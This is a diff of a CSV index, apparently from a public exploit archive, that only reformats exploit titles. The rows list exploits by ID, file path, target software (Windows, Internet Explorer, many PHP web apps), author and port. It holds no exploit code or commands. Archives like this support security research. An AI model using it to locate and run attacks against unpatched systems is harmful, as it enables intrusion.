Updated 07_11_2014

files.csv

@@ -258,7 +258,7 @@ id,file,description,date,author,platform,type,port
 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0
 273,platforms/linux/local/273.c,"SquirrelMail chpasswd buffer overflow",2004-04-20,x314,linux,local,0
 274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0
-275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
+275,platforms/windows/remote/275.c,"MS Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443
 276,platforms/windows/dos/276.delphi,"MS Windows 2K/XP TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0
 277,platforms/linux/remote/277.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53
 279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53
@@ -1672,7 +1672,7 @@ id,file,description,date,author,platform,type,port
 1962,platforms/osx/local/1962.pl,"Mac OS X <= 10.4.6 (launchd) Local Format String Exploit (x86)",2006-06-28,"Kevin Finisterre",osx,local,0
 1963,platforms/php/webapps/1963.txt,"GeekLog <= 1.4.0sr3 (_CONF[path]) Remote File Include Vulnerabilities",2006-06-29,Kw3[R]Ln,php,webapps,0
 1964,platforms/php/webapps/1964.php,"GeekLog <= 1.4.0sr3 f(u)ckeditor - Remote Code Execution Exploit",2006-06-29,rgod,php,webapps,0
-1965,platforms/windows/remote/1965.pm,"MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
+1965,platforms/windows/remote/1965.pm,"MS Windows - RRAS RASMAN Registry Stack Overflow Exploit (MS06-025)",2006-06-29,Pusscat,windows,remote,445
 1967,platforms/windows/dos/1967.c,"MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit",2006-06-30,Preddy,windows,dos,0
 1968,platforms/php/webapps/1968.php,"deV!Lz Clanportal [DZCP] <= 1.34 (id) Remote SQL Injection Exploit",2006-07-01,x128,php,webapps,0
 1969,platforms/php/webapps/1969.txt,"Stud.IP <= 1.3.0-2 Multiple Remote File Include Vulnerabilities",2006-07-01,"Hamid Ebadi",php,webapps,0
@@ -1750,11 +1750,11 @@ id,file,description,date,author,platform,type,port
 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS <= 3.0.1 (SD_DIR) Remote File Include Vulnerability",2006-07-20,Aesthetico,php,webapps,0
 2050,platforms/php/webapps/2050.php,"LoudBlog <= 0.5 (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
 2051,platforms/linux/dos/2051.py,"Sendmail <= 8.13.5 - Remote Signal Handling Exploit PoC",2006-07-21,redsand,linux,dos,0
-2052,platforms/windows/remote/2052.sh,"MS Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
+2052,platforms/windows/remote/2052.sh,"MS Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014)",2006-07-21,redsand,windows,remote,0
 2053,platforms/multiple/remote/2053.rb,"Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)",2006-07-21,bannedit,multiple,remote,110
-2054,platforms/windows/remote/2054.txt,"MS Windows DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
+2054,platforms/windows/remote/2054.txt,"MS Windows - DHCP Client Broadcast Attack Exploit (MS06-036)",2006-07-21,redsand,windows,remote,0
 2056,platforms/windows/local/2056.c,"Microsoft IIS ASP - Stack Overflow Exploit (MS06-034)",2006-07-21,cocoruder,windows,local,0
-2057,platforms/windows/dos/2057.c,"MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
+2057,platforms/windows/dos/2057.c,"MS Windows - Mailslot Ring0 Memory Corruption Exploit (MS06-035)",2006-07-21,cocoruder,windows,dos,0
 2058,platforms/php/webapps/2058.txt,"PHP Forge <= 3 beta 2 (cfg_racine) Remote File Inclusion Vulnerability",2006-07-22,"Virangar Security",php,webapps,0
 2059,platforms/hardware/dos/2059.cpp,"D-Link Router UPNP Stack Overflow Denial of Service Exploit (PoC)",2006-07-22,ub3rst4r,hardware,dos,0
 2060,platforms/php/webapps/2060.txt,"PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability",2006-07-23,magnific,php,webapps,0
@@ -1856,9 +1856,9 @@ id,file,description,date,author,platform,type,port
 2159,platforms/php/webapps/2159.pl,"PHPMyRing <= 4.2.0 (view_com.php) Remote SQL Injection Exploit",2006-08-09,simo64,php,webapps,0
 2160,platforms/windows/dos/2160.c,"OpenMPT <= 1.17.02.43 Multiple Remote Buffer Overflow Exploit PoC",2006-08-10,"Luigi Auriemma",windows,dos,0
 2161,platforms/php/webapps/2161.pl,"SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit",2006-08-10,simo64,php,webapps,0
-2162,platforms/windows/remote/2162.pm,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445
+2162,platforms/windows/remote/2162.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040)",2006-08-10,"H D Moore",windows,remote,445
 2163,platforms/php/webapps/2163.txt,"phpwcms <= 1.1-RC4 (spaw) Remote File Include Vulnerability",2006-08-10,Morgan,php,webapps,0
-2164,platforms/windows/remote/2164.pm,"Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0
+2164,platforms/windows/remote/2164.pm,"Internet Explorer - (MDAC) Remote Code Execution Exploit (MS06-014) (2)",2006-08-10,"H D Moore",windows,remote,0
 2165,platforms/php/webapps/2165.txt,"Spaminator <= 1.7 (page) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0
 2166,platforms/php/webapps/2166.txt,"Thatware <= 0.4.6 (root_path) Remote File Include Vulnerability",2006-08-10,Drago84,php,webapps,0
 2167,platforms/php/webapps/2167.txt,"SaveWebPortal <= 3.4 (page) Remote File Inclusion Vulnerability",2006-08-10,Bl0od3r,php,webapps,0
@@ -1916,7 +1916,7 @@ id,file,description,date,author,platform,type,port
 2220,platforms/php/webapps/2220.txt,"Tutti Nova <= 1.6 (TNLIB_DIR) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2221,platforms/php/webapps/2221.txt,"Fantastic News <= 2.1.3 (script_path) Remote File Include Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2222,platforms/php/webapps/2222.txt,"Mambo com_lurm_constructor Component <= 0.6b Include Vulnerability",2006-08-19,mdx,php,webapps,0
-2223,platforms/windows/remote/2223.c,"MS Windows CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
+2223,platforms/windows/remote/2223.c,"MS Windows - CanonicalizePathName() Remote Exploit (MS06-040)",2006-08-19,Preddy,windows,remote,139
 2224,platforms/php/webapps/2224.txt,"ZZ:FlashChat <= 3.1 - (adminlog) Remote File Incude Vulnerability",2006-08-19,SHiKaA,php,webapps,0
 2225,platforms/php/webapps/2225.txt,"mambo com_babackup Component <= 1.1 File Include Vulnerability",2006-08-19,mdx,php,webapps,0
 2226,platforms/php/webapps/2226.txt,"NES Game and NES System <= c108122 File Include Vulnerabilities",2006-08-20,Kacper,php,webapps,0
@@ -1958,7 +1958,7 @@ id,file,description,date,author,platform,type,port
 2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0
 2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 (main.php) Remote File Include Vulnerability",2006-08-27,SHiKaA,php,webapps,0
 2264,platforms/windows/local/2264.htm,"VMware 5.5.1 (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0
-2265,platforms/windows/remote/2265.c,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
+2265,platforms/windows/remote/2265.c,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445
 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval Vulnerability",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple Remote SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0
 2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0
@@ -2048,7 +2048,7 @@ id,file,description,date,author,platform,type,port
 2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download Vulnerability",2006-09-12,Trex,php,webapps,0
 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 Remote File Include Vulnerability",2006-09-12,CeNGiZ-HaN,php,webapps,0
 2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 (dir_path) Remote File Include Vulnerability",2006-09-12,SHiKaA,php,webapps,0
-2355,platforms/windows/remote/2355.pm,"MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
+2355,platforms/windows/remote/2355.pm,"MS Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3)",2006-09-13,"Trirat Puttaraksa",windows,remote,445
 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 (set) Remote File Include Vulnerability",2006-09-13,mdx,php,webapps,0
 2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include Vulnerability",2006-09-13,Rivertam,php,webapps,0
 2358,platforms/windows/remote/2358.c,"MS Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0
@@ -2105,7 +2105,7 @@ id,file,description,date,author,platform,type,port
 2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 (dix.php3) Remote File Include Vulnerability",2006-09-21,DaDIsS,php,webapps,0
 2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 (phpQRootDir) Remote File Include Vulnerability",2006-09-21,Solpot,php,webapps,0
 2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0
-2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
+2412,platforms/windows/local/2412.c,"MS Windows (Windows Kernel) - Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0
 2413,platforms/php/webapps/2413.txt,"SolidState <= 0.4 - Multiple Remote File Include Vulnerabilities",2006-09-21,Kacper,php,webapps,0
 2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 (include/xss/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0
 2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0
@@ -2476,7 +2476,7 @@ id,file,description,date,author,platform,type,port
 2786,platforms/php/webapps/2786.txt,"torrentflux <= 2.2 (create/exec/delete) Multiple Vulnerabilities",2006-11-15,r0ut3r,php,webapps,0
 2787,platforms/windows/dos/2787.c,"UniversalFTP 1.0.50 (MKD) Remote Denial of Service Exploit",2006-11-15,"Greg Linares",windows,dos,0
 2788,platforms/osx/local/2788.pl,"Kerio WebSTAR 5.4.2 (libucache.dylib) Privilege Escalation Exploit (OSX)",2006-11-15,"Kevin Finisterre",osx,local,0
-2789,platforms/windows/remote/2789.cpp,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0
+2789,platforms/windows/remote/2789.cpp,"MS Windows - NetpManageIPCConnect Stack Overflow Exploit (MS06-070)",2006-11-16,cocoruder,windows,remote,0
 2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0
 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure Vulnerability",2006-11-16,"Craig Heffner",php,webapps,0
 2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0
@@ -2485,7 +2485,7 @@ id,file,description,date,author,platform,type,port
 2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
 2799,platforms/php/webapps/2799.txt,"mxBB Module calsnails 1.06 (mx_common.php) File Include Vulnerability",2006-11-17,bd0rk,php,webapps,0
-2800,platforms/windows/remote/2800.cpp,"MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0
+2800,platforms/windows/remote/2800.cpp,"MS Windows - Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)",2006-11-17,"S A Stevens",windows,remote,0
 2807,platforms/php/webapps/2807.pl,"MosReporter Joomla Component 0.9.3 - Remote File Include Exploit",2006-11-17,Crackers_Child,php,webapps,0
 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a (check_status.php) Remote File Include Vulnerability",2006-11-17,DeltahackingTEAM,php,webapps,0
 2809,platforms/windows/remote/2809.py,"MS Windows NetpManageIPCConnect Stack Overflow Exploit (py)",2006-11-18,"Winny Thomas",windows,remote,445
@@ -2574,7 +2574,7 @@ id,file,description,date,author,platform,type,port
 2897,platforms/php/webapps/2897.txt,"CM68 News <= 12.02.06 (addpth) Remote File Inclusion Vulnerability",2006-12-08,"Paul Bakoyiannis",php,webapps,0
 2898,platforms/php/webapps/2898.txt,"ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability",2006-12-08,r0ut3r,php,webapps,0
 2899,platforms/php/webapps/2899.txt,"paFileDB 3.5.2/3.5.3 - Remote Login Bypass SQL Injection Vulnerability",2006-12-08,koray,php,webapps,0
-2900,platforms/windows/dos/2900.py,"MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
+2900,platforms/windows/dos/2900.py,"MS Windows DNS Resolution - Remote Denial of Service PoC (MS06-041)",2006-12-09,"Winny Thomas",windows,dos,0
 2901,platforms/windows/dos/2901.php,"Filezilla FTP Server 0.9.20b/0.9.21 (STOR) Denial of Service Exploit",2006-12-09,rgod,windows,dos,0
 2902,platforms/php/webapps/2902.pl,"TorrentFlux 2.2 (downloaddetails.php) Local File Disclosure Exploit",2006-12-09,r0ut3r,php,webapps,0
 2903,platforms/php/webapps/2903.pl,"TorrentFlux 2.2 (maketorrent.php) Remote Command Execution Exploit",2006-12-09,r0ut3r,php,webapps,0
@@ -2806,7 +2806,7 @@ id,file,description,date,author,platform,type,port
 3133,platforms/windows/remote/3133.pl,"Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit",2007-01-15,"Jacopo Cervini",windows,remote,143
 3134,platforms/php/webapps/3134.php,"KGB <= 1.9 (sesskglogadmin.php) Local File Include Exploit",2007-01-15,Kacper,php,webapps,0
 3135,platforms/asp/webapps/3135.txt,"Okul Web Otomasyon Sistemi 4.0.1 - Remote SQL Injection Vulnerability",2007-01-15,"ilker Kandemir",asp,webapps,0
-3137,platforms/windows/remote/3137.html,"MS Internet Explorer VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0
+3137,platforms/windows/remote/3137.html,"MS Internet Explorer - VML Remote Buffer Overflow Exploit (MS07-004)",2007-01-16,LifeAsaGeek,windows,remote,0
 3138,platforms/windows/dos/3138.pl,"Twilight Webserver 1.3.3.0 (GET) Remote Denial of Service Exploit",2003-07-07,N/A,windows,dos,0
 3139,platforms/osx/dos/3139.rb,"Colloquy <= 2.1.3545 (INVITE) Format String Denial of Service Exploit",2007-01-17,MoAB,osx,dos,0
 3140,platforms/windows/remote/3140.pl,"Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit",2007-01-17,UmZ,windows,remote,21
@@ -2817,7 +2817,7 @@ id,file,description,date,author,platform,type,port
 3145,platforms/php/webapps/3145.txt,"PHPMyphorum 1.5a (mep/frame.php) Remote File Include Vulnerability",2007-01-17,v1per-haCker,php,webapps,0
 3146,platforms/php/webapps/3146.pl,"Woltlab Burning Board <= 1.0.2 / 2.3.6 - search.php SQL Injection Exploit (3)",2007-01-17,666,php,webapps,0
 3147,platforms/php/webapps/3147.txt,"Uberghey 0.3.1 (frontpage.php) Remote File Include Vulnerability",2007-01-17,GoLd_M,php,webapps,0
-3148,platforms/windows/remote/3148.pl,"MS Internet Explorer VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0
+3148,platforms/windows/remote/3148.pl,"MS Internet Explorer - VML Download and Execute Exploit (MS07-004)",2007-01-17,pang0,windows,remote,0
 3149,platforms/windows/local/3149.cpp,"Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit",2007-01-17,porkythepig,windows,local,0
 3150,platforms/php/webapps/3150.txt,"Oreon <= 1.2.3 RC4 (lang/index.php file) Remote InclusionVulnerability",2007-01-17,3l3ctric-Cracker,php,webapps,0
 3151,platforms/osx/dos/3151.rb,"Mac OS X 10.4.8 SLP Daemon Service Registration Buffer Overflow PoC",2007-01-18,MoAB,osx,dos,0
@@ -2861,7 +2861,7 @@ id,file,description,date,author,platform,type,port
 3190,platforms/windows/dos/3190.py,"MS Windows Explorer (AVI) Unspecified Denial of Service Exploit",2007-01-24,shinnai,windows,dos,0
 3191,platforms/php/webapps/3191.txt,"vhostadmin 0.1 (MODULES_DIR) Remote File Inclusion Vulnerability",2007-01-24,3l3ctric-Cracker,php,webapps,0
 3192,platforms/php/webapps/3192.pl,"Xero Portal (phpbb_root_path) Remote File Include Vulnerablity",2007-01-24,"Mehmet Ince",php,webapps,0
-3193,platforms/windows/dos/3193.py,"Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
+3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record DoS PoC (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0
 3194,platforms/asp/webapps/3194.txt,"makit Newsposter Script 3.0 - Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0
 3195,platforms/asp/webapps/3195.txt,"GPS CMS 1.2 (print.asp) Remote SQL Injection Vulnerability",2007-01-25,ajann,asp,webapps,0
 3196,platforms/php/webapps/3196.php,"Aztek Forum 4.0 - Multiple Vulnerabilities Exploit",2007-01-25,DarkFig,php,webapps,0
@@ -3108,7 +3108,7 @@ id,file,description,date,author,platform,type,port
 3441,platforms/linux/dos/3441.c,"Linux Omnikey Cardman 4040 driver Local Buffer Overflow Exploit PoC",2007-03-09,"Daniel Roethlisberger",linux,dos,0
 3442,platforms/multiple/local/3442.php,"PHP 4.4.6 cpdf_open() Local Source Code Discslosure PoC",2007-03-09,rgod,multiple,local,0
 3443,platforms/php/webapps/3443.txt,"PMB Services <= 3.0.13 Multiple Remote File Inclusion Vulnerability",2007-03-09,K-159,php,webapps,0
-3444,platforms/windows/dos/3444.pl,"MS Internet Explorer (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0
+3444,platforms/windows/dos/3444.pl,"MS Internet Explorer - (FTP Server Response) DoS Exploit (MS07-016)",2007-03-09,"Mathew Rowley",windows,dos,0
 3447,platforms/php/webapps/3447.txt,"Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns",2007-03-09,Omni,php,webapps,0
 3448,platforms/php/webapps/3448.txt,"work system e-commerce <= 3.0.5 - Remote File Inclusion Vulnerability",2007-03-10,"Rodrigo Duarte",php,webapps,0
 3449,platforms/php/webapps/3449.txt,"HC Newssystem 1.0-1.4 (index.php ID) Remote SQL Injection Vulnerability",2007-03-10,WiLdBoY,php,webapps,0
@@ -3235,7 +3235,7 @@ id,file,description,date,author,platform,type,port
 3574,platforms/php/webapps/3574.pl,"PBlang 4.66z Remote Code Execution Exploit",2007-03-25,Hessam-x,php,webapps,0
 3575,platforms/windows/remote/3575.cpp,"Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows)",2007-03-25,Heretic2,windows,remote,0
 3576,platforms/windows/local/3576.php,"PHP 5.2.1 with PECL phpDOC Local Buffer Overflow Exploit",2007-03-25,rgod,windows,local,0
-3577,platforms/windows/remote/3577.html,"MS Internet Explorer Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
+3577,platforms/windows/remote/3577.html,"MS Internet Explorer - Recordset Double Free Memory Exploit (MS07-009)",2007-03-26,N/A,windows,remote,0
 3578,platforms/bsd/local/3578.c,"FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit",2007-03-26,harry,bsd,local,0
 3579,platforms/windows/remote/3579.py,"Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)",2007-03-26,"Winny Thomas",windows,remote,21
 3580,platforms/php/webapps/3580.pl,"IceBB 1.0-rc5 Remote Create Admin Exploit",2007-03-26,Hessam-x,php,webapps,0
@@ -3342,7 +3342,7 @@ id,file,description,date,author,platform,type,port
 3685,platforms/php/webapps/3685.txt,"MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
 3686,platforms/php/webapps/3686.txt,"WitShare 0.9 (index.php menu) Local File Inclusion Vulnerability",2007-04-08,the_Edit0r,php,webapps,0
 3687,platforms/php/webapps/3687.txt,"ScarNews 1.2.1 (sn_admin_dir) Local File Inclusion Exploit",2007-04-08,BeyazKurt,php,webapps,0
-3688,platforms/windows/local/3688.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
+3688,platforms/windows/local/3688.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017)",2007-04-08,Ivanlef0u,windows,local,0
 3689,platforms/php/webapps/3689.txt,"PcP-Guestbook 3.0 (lang) Local File Inclusion Vulnerabilities",2007-04-08,Dj7xpl,php,webapps,0
 3690,platforms/windows/dos/3690.txt,"microsoft office word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0
 3691,platforms/php/webapps/3691.txt,"Battle.net Clan Script for PHP 1.5.1 - Remote SQL Injection Vulnerability",2007-04-09,"h a c k e r _ X",php,webapps,0
@@ -3381,7 +3381,7 @@ id,file,description,date,author,platform,type,port
 3725,platforms/php/webapps/3725.php,"Chatness <= 2.5.3 (options.php/save.php) Remote Code Execution Exploit",2007-04-12,Gammarays,php,webapps,0
 3726,platforms/multiple/dos/3726.c,"Ettercap-NG 0.7.3 - Remote Denial of Service Exploit",2007-04-13,evilrabbi,multiple,dos,0
 3727,platforms/windows/local/3727.c,"VCDGear <= 3.56 Build 050213 (FILE) Local Code Execution Exploit",2007-04-13,InTeL,windows,local,0
-3728,platforms/windows/remote/3728.c,"IE NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0
+3728,platforms/windows/remote/3728.c,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit",2007-04-13,InTeL,windows,remote,0
 3729,platforms/php/webapps/3729.txt,"qdblog 0.4 (SQL Injection/lfi) Multiple Vulnerabilities",2007-04-13,Omni,php,webapps,0
 3730,platforms/linux/local/3730.txt,"ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)",2007-04-13,Xpl017Elz,linux,local,0
 3731,platforms/php/webapps/3731.php,"Frogss CMS <= 0.7 - Remote SQL Injection Exploit",2007-04-13,Kacper,php,webapps,0
@@ -3408,7 +3408,7 @@ id,file,description,date,author,platform,type,port
 3752,platforms/php/webapps/3752.txt,"AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities",2007-04-17,"Alkomandoz Hacker",php,webapps,0
 3753,platforms/php/webapps/3753.txt,"Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI",2007-04-17,"Cold Zero",php,webapps,0
 3754,platforms/php/webapps/3754.pl,"MiniGal b13 (image backdoor) Remote Code Execution Exploit",2007-04-17,Dj7xpl,php,webapps,0
-3755,platforms/windows/local/3755.c,"MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2",2007-04-17,"Lionel d'Hauenens",windows,local,0
+3755,platforms/windows/local/3755.c,"MS Windows GDI - Local Privilege Escalation Exploit (MS07-017) (2)",2007-04-17,"Lionel d'Hauenens",windows,local,0
 3756,platforms/php/webapps/3756.txt,"Cabron Connector 1.1.0-Full Remote File Inclusion Vulnerability",2007-04-17,Dj7xpl,php,webapps,0
 3757,platforms/windows/local/3757.txt,"OllyDbg 1.10 Local Format String Exploit",2007-04-17,jamikazu,windows,local,0
 3758,platforms/php/webapps/3758.php,"ShoutPro <= 1.5.2 (shout.php) Remote Code Injection Exploit",2007-04-17,Gammarays,php,webapps,0
@@ -3457,11 +3457,11 @@ id,file,description,date,author,platform,type,port
 3801,platforms/windows/local/3801.c,"Gimp 2.2.14 .RAS File SUNRAS Plugin Buffer Overflow Exploit",2007-04-26,Marsu,windows,local,0
 3802,platforms/php/webapps/3802.txt,"phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability",2007-04-26,koray,php,webapps,0
 3803,platforms/php/webapps/3803.txt,"phpOracleView (include_all.inc.php page_dir) RFI Vulnerability",2007-04-26,"Alkomandoz Hacker",php,webapps,0
-3804,platforms/windows/remote/3804.txt,"MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
+3804,platforms/windows/remote/3804.txt,"MS Windows - (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)",2007-04-26,"Lionel d'Hauenens",windows,remote,0
 3805,platforms/php/webapps/3805.txt,"Firefly 1.1.01 (doc_root) Remote File Inclusion Vulnerabilities",2007-04-26,"Alkomandoz Hacker",php,webapps,0
 3806,platforms/php/webapps/3806.txt,"EsForum 3.0 (forum.php idsalon) Remote SQL Injection Vulnerability",2007-04-26,"ilker Kandemir",php,webapps,0
 3807,platforms/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow PoC",2007-04-27,mu-b,linux,dos,0
-3808,platforms/windows/remote/3808.html,"IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2",2007-04-27,shinnai,windows,remote,0
+3808,platforms/windows/remote/3808.html,"Internet Explorer NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow Exploit 2",2007-04-27,shinnai,windows,remote,0
 3809,platforms/php/webapps/3809.txt,"burnCMS <= 0.2 (root) Remote File Inclusion Vulnerabilities",2007-04-27,GoLd_M,php,webapps,0
 3810,platforms/windows/remote/3810.html,"IPIX Image Well ActiveX (iPIX-ImageWell-ipix.dll) BoF Exploit",2007-04-27,"Umesh Wanve",windows,remote,0
 3811,platforms/windows/local/3811.c,"IrfanView <= 4.00 .IFF File Buffer Overflow Exploit",2007-04-27,Marsu,windows,local,0
@@ -3544,7 +3544,7 @@ id,file,description,date,author,platform,type,port
 3888,platforms/windows/local/3888.c,"Gimp 2.2.14 .RAS File Download/Execute Buffer Overflow Exploit (win32)",2007-05-09,"Kristian Hermansen",windows,local,0
 3890,platforms/windows/dos/3890.html,"McAfee VirusScan 10.0.21 ActiveX control Stack Overflow PoC",2007-05-09,callAX,windows,dos,0
 3891,platforms/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 RControl.dll Denial of Service Exploit",2007-05-10,shinnai,windows,dos,0
-3892,platforms/windows/remote/3892.html,"MS Internet Explorer <= 7 Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
+3892,platforms/windows/remote/3892.html,"MS Internet Explorer <= 7 - Remote Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled ActiveX BoF Exploit",2007-05-10,Jambalaya,windows,remote,0
 3894,platforms/php/webapps/3894.txt,"Original 0.11 config.inc.php x[1] Remote File Inclusion Vulnerability",2007-05-10,GoLd_M,php,webapps,0
 3895,platforms/php/webapps/3895.txt,"Thyme Calendar 1.3 - Remote SQL Injection Vulnerability",2007-05-10,warlord,php,webapps,0
@@ -3644,7 +3644,7 @@ id,file,description,date,author,platform,type,port
 3990,platforms/php/webapps/3990.txt,"vBulletin vBGSiteMap 2.41 (root) Remote File Inclusion Vulnerabilities",2007-05-25,"Cold Zero",php,webapps,0
 3991,platforms/php/webapps/3991.txt,"OpenBASE 0.6a (root_prefix) Remote File Inclusion Vulnerabilities",2007-05-25,DeltahackingTEAM,php,webapps,0
